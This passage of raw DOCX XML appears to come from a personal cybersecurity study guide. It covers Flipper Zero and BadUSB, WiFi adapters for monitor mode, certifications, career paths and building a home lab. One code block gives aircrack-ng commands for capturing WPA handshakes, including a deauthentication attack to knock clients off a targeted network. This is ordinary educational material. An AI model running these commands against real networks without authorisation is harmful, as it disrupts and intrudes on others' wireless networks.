        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IR (Infrared): Universal remote for TVs and other IR devices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BadUSB: Emulates keyboard and executes pre-loaded payloads when plugged into a computer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GPIO: Connects to external hardware via pins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Flipper can also connect to ESP32 development boards via GPIO to extend its capabilities with WiFi and Bluetooth attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">11.4 Wireless Adapters for Monitor Mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Not all WiFi adapters support monitor mode and packet injection - essential for wireless security testing. Recommended chipsets:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Alfa AWUS036ACH (RTL8812AU): Dual-band, supports monitor mode and injection on both 2.4 and 5GHz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Alfa AWUS036NHA (AR9271): 2.4GHz only but excellent driver support in Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Panda PAU09 (RT5572): Budget-friendly dual-band option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enable monitor mode on wireless adapter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo airmon-ng check kill          # Kill interfering processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo airmon-ng start wlan0         # Start monitor mode (creates wlan0mon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Capture handshakes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo airodump-ng wlan0mon           # List networks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon  # Target a network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo aireplay-ng -0 5 -a BSSID wlan0mon  # Deauth clients to force handshake</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART SEVEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BUILDING A CAREER IN CYBERSECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 12: Certifications, Career Paths &amp; Study Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity has multiple well-defined career paths. Understanding them helps you invest your time where it counts and build credentials employers recognize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1 The Certification Landscape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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20"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="2300"/>
        <w:gridCol w:w="2640"/>
      </w:tblGrid>
      <w:tr>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Certification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Issuer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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23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Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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CompTIA A+</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CompTIA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Entry</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Hardware, OS fundamentals</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Foundation for all IT paths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CompTIA Network+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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CompTIA</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Entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Networking fundamentals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Required knowledge for security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CompTIA Security+</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CompTIA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Entry/Mid</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Security fundamentals, DoD approved</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Industry baseline, often required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CompTIA Tech+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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CompTIA</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Entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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IT fundamentals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Good starting point (Eros has this)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eJPT</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eLearnSecurity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Beginner</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Practical pentesting</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Excellent first hands-on cert</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OSCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Offensive Security</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Intermediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Practical penetration testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Most respected offensive cert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CEH</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EC-Council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Mid</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Ethical hacking theory</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Common in job listings but theory-heavy</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PNPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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TCM Security</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Intermediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Practical network pentesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Excellent value, practical focused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CISSP</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ISC2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Senior</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Security management</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Senior management/architect roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">12.2 Career Paths in Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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Primary Work</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Skills Needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Path From Here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SOC Analyst (L1/L2)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Monitor alerts, triage incidents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 analysis, SIEM, networking</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Starting point for many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Penetration Tester</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Attack systems with permission</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All offensive security skills</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Certifications + labs + reports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 Team Operator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Simulate advanced persistent threats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Advanced exploitation, OPSEC</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Years of pentesting experience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Blue Team / Defender</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Protect and detect attacks</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SIEM, SOAR, forensics, hardening</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SOC experience + certs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Purple Team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Bridge red and blue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Both offensive and defensive skills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Experience in both red and blue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Security Engineer</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Build and maintain security systems</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Dev skills + security knowledge</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Coding + security background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Forensics Analyst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Investigate incidents and evidence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Forensics tools, chain of custody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Law enforcement or enterprise IR</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Network Security Admin</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Manage firewalls, IDS, network sec</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Networking deep knowledge</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Network admin background (Eros)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">12.3 Building Your Home Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A home lab is non-negotiable for a cybersecurity career. You cannot develop hands-on skills without practicing hands-on. Here's how to build one on a budget:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimum Viable Lab:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Main attack machine: Kali Linux (physical or VM). Even a mid-range laptop works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable target: Metasploitable, VulnHub VMs, HackTheBox, TryHackMe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network: A basic switch and home router for segmentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualization: VirtualBox (free) or VMware Workstation Player</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Lab Components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dedicated pfSense firewall for network control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server VM with Active Directory for enterprise practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple OS targets (Windows 7, Windows 10, Server 2019, various Linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardware attack tools (Flipper Zero, WiFi adapter with injection support)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Raspberry Pi for hardware projects and portable attack platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Online Practice Platforms:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox (HTB): Industry standard CTF-style labs. Used in CPTS preparation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
